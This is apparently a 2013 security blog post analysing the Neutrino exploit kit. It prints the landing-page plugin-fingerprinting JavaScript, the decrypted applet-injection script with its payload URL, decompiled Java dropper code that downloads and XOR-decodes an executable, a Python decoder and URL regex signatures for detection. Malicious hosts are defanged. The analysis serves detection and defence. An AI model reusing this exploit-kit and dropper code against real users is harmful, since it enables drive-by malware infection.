Friday, May 10, 2013

Neutrino Exploit Kit analysis


I have previously looked at the neutrino landing page: Neutrino landing page demystified and Neutrino landing pane change.
There obviously are quite a few Neutrino live kits out there so it is time to take a closer look at this evil piece of software. Lets see if we can figure out what these bad actors are up to and make sure that we can detect activity related to the Neutrino exploit kit.



1. Gate


Neutrino has a gate which you will have to pass to be able to get to the landing pane. To get to the gate you normally follow a series of hacked sites which will redirect. The gate will give you html to move you over to the landing pane to look at your client and find a way to exploit you. If you have the url to the gate and a valid referer you will be able to get valid urls to the landing:

--2013-05-07 --  hxxp:// www.leritsuwa.biz/cust_gw/ads_m/show_bn.c.php?sid=27982987

Resolving www.leritsuwa.biz... 77.81.183.98

Connecting to www.leritsuwa.biz|77.81.183.98|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 402 [text/html]

Saving to: `c2_1.php'



     0K                                                       100% 24.7M=0s



2013-05-07 (24.7 MB/s) - `c2_1.php' saved [402/402]



<HTML><HEAD><title>Canadian Pharmacies Buy Generic Drugs Prescription International Online Pharmacy Drugstore</title><meta http-equiv="refresh" content="20;url=hxxp:// www.expressmedscanada.com/?id=
15&group=158"></HEAD><FRAMESET rows="100%" BORDER=0 FRAMEBORDER=0 FRAMESPACING=0><FRAME NAME="fi20o3893jhms" SRC="hxxp:// milk-cocoa.info/lghvewgr?foyuhtmbcj=3800964"><noframes></noframes></FRAMESET
></HTML>


You will over time get new urls to the landing pane:

hxxp: //milk-cocoa.info/lskbiqp?frglxucscol=3800964

hxxp: //milk-cocoa.info/lhdlqxyl?fbljocmikem=3800964

hxxp: //milk-cocoa.info/lsbqfqw?frovckttsq=3800964

hxxp: //milk-cocoa.info/liwmlvf?fehbyxmtxg=3800964

hxxp: //milk-cocoa.info/ltkirxwniohper?fgcycebw=3800964

hxxp: //freshaircleaner.org/lkyjngdxnteuq?fmcmkkkrl=3800964

hxxp: //borlanove.net/lxfyvqlynuq?fofgfj=3800964

hxxp: //ufohuntersde.com/lwjreshxkq?fwvpxubwtskl=3800964

hxxp: //ufohuntersde.org/luimkvtrqdjcp?fdekcxhep=3800964

hxxp: //ufohuntersde.org/lupofx?fowxcseexqhx=3800964

hxxp: //ufohuntersde.org/lupofx?fowxcseexqhx=3800964

hxxp: //ufohuntersde.info/lxinmt?fdsrfeodpqr=3800964

hxxp: //ufohuntersde.info/lcgdqbnvox?futqfwvjjm=3800964

hxxp: //ufohuntersde.info/lhpixuskkvx?fgtujfccrw=3800964

hxxp: //ufohuntersde.info/lumqnhjb?fjoywbpcihk=3800964

hxxp: //morabudac.com/ldqumpgiqlrgh?flobicxfnq=3800964


I have however noticed that the 7 digit number for the f{random length lowercase random string} parameter stays the same over time. The urls to the landing will also be reused.

2. Landing pane


<!DOCTYPE HTML>
<html>
<head>
 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> 
 <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
 <script type="text/javascript">
  $(document).ready(function() {
   АН602(
    '51895b4daaa2ccbb52175bd0', 
    'wvwyk', 
    'ckjktkjbjz',
    'pmoqfbqjzr',
    'ifhebqbx'    
   );
  });

  function АН602(hid, pass, cph, xpn, ipn) {
   var info = {
    hid : hid,
    plugins : {
     adobe_reader: PluginDetect.getVersion('AdobeReader'),
     java: PluginDetect.getVersion('Java'),
     flash: PluginDetect.getVersion('Flash'),
     quick_time: PluginDetect.getVersion('QuickTime'),
     real_player: PluginDetect.getVersion('RealPlayer'),
     shockwave: PluginDetect.getVersion('Shockwave'),
     silver_light: PluginDetect.getVersion('Silverlight'),
     vlc: PluginDetect.getVersion('VLC'),
     wmp: PluginDetect.getVersion('WMP')
    }
   };

   var obj = {};
   obj[xpn] = pass;
   obj[ipn] = encodeURIComponent(xor(JSON.stringify(info), pass));
   
   $.post(cph, obj, function(data, status){
    $("body").append(xor(decodeURIComponent(data), pass));
   });
   
  }

  function xor(input, pass) {
   var output = "";
   var i = 0;
   var pos = 0;
   for (i = 0; i < input.length; i++){ 
     pos = Math.floor(i%pass.length);
     output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
   }
   return output;
  }

  JSON.stringify = JSON.stringify || function (obj) {
   var t = typeof (obj);
   if (t != "object" || obj === null) {
    // simple data type
    if (t == "string") obj = '"'+obj+'"';
    return String(obj);
   }
   else {
    // recurse array or object
    var n, v, json = [], arr = (obj && obj.constructor == Array);
    for (n in obj) {
     v = obj[n]; t = typeof(v);
     if (t == "string") v = '"'+v+'"';
     else if (t == "object" && v !== null) v = JSON.stringify(v);
     json.push((arr ? "" : '"' + n + '":') + String(v));
    }
    return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
   }
  };
 </script> 
</head>
<body>
</body>
</html>




This we do recognize from the post Neutrino landing pane change or variation. The jquery and plugin_detector stuff is documented in the Neutrino landing page demystified.


3. Start the more evil stuff

The landing pane will report whats installed on your computer and will fetch javascript code to fetch exploits.




the HTTP POST request is covered in earlier posts

What do we get back:


K%05%14%0B%02%07%02W%15%0A%19%11%02%18%0C%12KP3%0A%01%17%04%1A%19%1E%06%03%5EU%7D%7F~pb~%1F%11YCP%3B%1E%1A%19%18%05%18%1F%1FW%3F%19%0D%0E%05%18%12%0DK2%0E%07%15%04%05%13%05%5EKJKW%17%0A%01%1F%10%18%1F%18%04Y%18%1B%078%16%14%0E%5EV%0Csb~%7F~pb%13%19%14%0C%06%12%18%03W%1C%05%1F%03%1CCPJ%16%09%1B%1B%13%03Y%04%15%1C%12%1A%1FJT6%1B%08Y%12%16%0DIW%17%05%1A%03%1E%12DI%1F%02%03%09QXY%1A%10%07%1C%5B%14%16%08%18%17Y%1A%04%1AY%12%08%13%05%1E%05%1E%06%1F%07%1B%09T%1F%1A%0D%0F%08%07%17JLZOOB%1B_%13%17%16%18Y%14%15%15%1B%5EEG%40L%09%13FUY%1C%1E%12%03%11VUGG%5BK%1F%13%1E%1E%03%03KUH%5BUHK%09%0A%05%17%1AY%05%16%1B%12DI%12%0E%12%1AIW%16%15%1E%12KU%18%23%25F%14%3D%04%01%3AEH%1B%151%04%0D2EO%1D%1BY2%03.KR%03%3AD%3B%03%14%3E9%03%0E%200%0E%23%3C%07%07%15K%21%1F%26E%11%5B%16%21%25%11%0F%20%02%0F%29%3F%22%0E8%3DF%2F%1D%2B.%211%11%26%1A8%1D%20%06%3EG%3A%13.D8%203%3A7JDIIJ%07%18%19%16%1BW%17%0A%1A%13J%5B%13%1C%13%0E%5BK%01%17%1B%0C%0EJT%06%12%12%02TIED%16%06%07%15%0E%03HPPP%7D%7F~pb~%0BW%1C%07%04%13W%02a~%7F~pb~%12%18%1A%1E%1A%13%19%0DE%04%1E%0D%0E_QK%1C%06%15%13%13Y%04%15%1C%12%1A%1FJT6%1B%08Y%12%16%0DIW%02%0E%09%0EJT%16%09%1B%1B%1F%14%18%1F%1E%19%19V%13Z%1C%16%0F%0AZ%17%07%09%07%12%02L%0F%0E%05%05%1E%16%05JGYOIW%17%05%1A%03%1E%12DI%1F%02%03%09QXY%1A%10%07%1C%5B%14%16%08%18%17Y%1A%04%1AY%12%08%13%05%1E%05%1E%06%1F%07%1B%09T%1F%1A%0D%0F%08%07%17JLZOOB%1B_%13%17%16%18Y%14%15%15%1B%5EEG%40L%09%13FUY%1C%1E%12%03%11VUGG%5BK%1F%13%1E%1E%03%03KUH%5BUV%12%01%0E%14KU%18%23%25F%14%3D%04%01%3AEH%1B%151%04%0D2EO%1D%1BY2%03.KR%03%3AD%3B%03%14%3E9%03%0E%200%0E%23%3C%07%07%15K%21%1F%26E%11%5B%16%21%25%11%0F%20%02%0F%29%3F%22%0E8%3DF%2F%1D%2B.%211%11%26%1A8%1D%20%06%3EG%3A%13.D8%203%3A7JDIW%0E%1C%1C%12JT%06%12%12%02TIED%12%1B%15%1C%0FIQ%5EBa~%7F~pb%0A%7C~pb~JX%0A%08%05%1F%07%0DU%7D%7F~


We need to URLDecode the answer and xor it to be able to understand what the bad guys are throwing at us. We have the XOR key from the landing.



<script language='Javascript'>

if ('Microsoft Internet Explorer' == navigator.appName) {
document.write('<applet object="Abc.dat" archive="hxxp:// milk-cocoa.com/eqxrhrgmhqlp?hlzvcpa=51895b4
daaa2ccbb52175bd0" width="10" height="10"><param name="exec" value="aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRhdWtxPTUxODk1YjRkYWFhMmNj
YmI1MjE3NWJkMA=="><param name="xkey" value="qkyu"></applet>');
} else {
document.write('<embed object="Abc.dat" type="application/x-java-applet;version=1.6" archive="hxxp:/
/ milk-cocoa.com/eqxrhrgmhqlp?hlzvcpa=51895b4daaa2ccbb52175bd0" width="10" height="10" exec="aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRh
dWtxPTUxODk1YjRkYWFhMmNjYmI1MjE3NWJkMA==" xkey="qkyu"></embed>');


As expected they want us to run some Java code.

4.  URL to the final payload


In the applet tag the "exec" variable has the value for the URL to the final payload/malware payload. This is base64encoded so we need to decode it:



hxxp:// milk-cocoa.com/papssyarejjoba?htidaukq=51895b4daaa2ccbb52175bd0


5. Malware


Start of the malware file:





This is, also as expected, obfuscated and  we need to go into the Java code to figure it out.

6. Java code cve


The Java Code is exploiting CVE-2013-0431 as described by Rapid7 here





7. Java code deobfuscation


First the payload url decodeing: get the parameter value of exec and base64 decode:


String str1 = getParameter("exec");
      if ((str1 == null) || (str1.length() == 0))
        System.exit(0);
      Object localObject3;
      if (!str1.startsWith("http"))
        try
        {
          BASE64Decoder localBASE64Decoder = new BASE64Decoder();
          localObject3 = localBASE64Decoder.decodeBuffer(str1);
          str1 = new String(localObject3, "UTF-8");


String:

aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRhdWtxPTUxODk1YjRkYWFhMmNjYmI1MjE3NWJkMA==

Decoded: hxxp:// milk-cocoa.com/papssyarejjoba?htidaukq=51895b4daaa2ccbb52175bd0

Where is the file saved:


File localFile = File.createTempFile("~tmp", ".exe");
          FileOutputStream localFileOutputStream = new FileOutputStream(localFile);

Get the xor key and deobfuscate the downloaded file:


String str3 = getParameter("xkey");
          if ((str3 != null) && (str3.length() != 0))
          {
            byte[] arrayOfByte3 = new byte[arrayOfByte2.length];
            arrayOfByte3 = xwk(arrayOfByte2, str3.getBytes("ISO_8859_1"));
            localFileOutputStream.write(arrayOfByte3);
          }

public byte[] xwk(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2)
  {
    byte[] arrayOfByte = new byte[paramArrayOfByte1.length];
    for (int i = 0; i < paramArrayOfByte1.length; i++)
      arrayOfByte[i] = (byte)(paramArrayOfByte1[i] ^ paramArrayOfByte2[(i % paramArrayOfByte2.length)]);
    return arrayOfByte;
  }



Iterate the file downloaded, XOR with the key byte for byte and start over when reaching the end.

Python is perfect for this:


#@malforsec py script to decode Neutrino bin files
def main():
  exefile = ''
  key = 'qkyu'
  with open('neutrino.bin', 'r') as f1:
    inf = f1.read()
    for i in range (0, len(inf),1):
      exefile += chr(ord(inf[i]) ^ ord(key[i % len(key)]))
  with open('neutrino.exe', 'w') as outf:
    outf.write(exefile)

if __name__ == "__main__":
    main() 


Did we get it right:

0000000: 4d5a c290 0003 0000 0004 0000 00c3 bfc3  MZ..............
0000010: bf00 00c2 b800 0000 0000 0000 4000 0000  ............@...
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: c390 0000 000e 1fc2 ba0e 00c2 b409 c38d  ................
0000050: 21c2 b801 4cc3 8d21 5468 6973 2070 726f  !...L..!This pro
0000060: 6772 616d 2063 616e 6e6f 7420 6265 2072  gram cannot be r
0000070: 756e 2069 6e20 444f 5320 6d6f 6465 2e0d  un in DOS mode..
0000080: 0d0a 2400 0000 0000 0000 4360 c291 c2af  ..$.......C`....
0000090: 0701 c3bf c3bc 0701 c3bf c3bc 0701 c3bf  ................
00000a0: c3bc 20c3 87c2 82c3 bc06 01c3 bfc3 bc07  .. .............
00000b0: 01c3 bec3 bc6d 01c3 bfc3 bc20 c387 c284  .....m..... ....
00000c0: c3bc 0801 c3bf c3bc 20c3 87c2 85c3 bc06  ........ .......
00000d0: 01c3 bfc3 bc20 c387 c292 c3bc 1101 c3bf  ..... ..........

Oh yeah thats an exe file.


Virustotal for the exe: 2/46

Virustotal for the JAR: 2/45

8. Network detection


Lets have a look at @malwaresigs and see if we got the same. Looks like the old signature description is still valid. The HTTP POST request has changed as the "hid" aka host id variable now is incorporated in the URL Encoded part.

Looks like we can be more specific on:

*Change in patterns - spotted by @Set_Abominae 2013-05-15 - URLQuery

JARs: /(c|e)[a-z0-9]{1,11}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$

EXEs: /(d|p)[a-z0-9]{1,16}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$

landing: /(a|l)[a-z0-9]{1,16}\?(f|q)[a-z0-9]{1,12}=[0-9]{7}$

*Lets see if the change in URL patterns will continue. If so revert to signatures over @malwaresigs.


Update 2013-05-15
I have observed more patterns matching what @Set_Abominae reported yesterday.

Update 2013-07-29
The url patterns keep changing: Thanks to @urlquey and @node5 for providing samples!
JARs:/m[a-z0-9]{1,11}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{0,9})$
EXEs: /j[a-z0-9]{1,16}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$
landing: /s[a-z0-9]{1,16}\?d[a-z0-9]{1,12}=[0-9]{7}$

Happy analyzing and detecting Neutrino Exploit Kit activity :)

Neutrino references:
@kafein over at malware.dontneedcoffee.com has good stuff on Neutrino too.

Post publish reading:
blog.unmaskparasites.com - "Rotating iframe urls - one a minute"
malwaremustdie - "Knockin' on Neutrino Exploit Kit's door.."


2 comments:

  1. is this sploitpack decodes obfuscated EXE directly into memory to avoid AV detects?

    ReplyDelete
  2. If I understand your question correctly: the obfuscation will protect from detection so no need for any trick there.
    The exe file is saved to disk. Thats normally when AV kicks in to check files(on access scanning).
    But yes the obfuscated file is read in, deobfuscated and written to disk. And remember the Java code runs in priveleged mode.

    Thats my view. If nanyone sees it diffrently please let me know

    ReplyDelete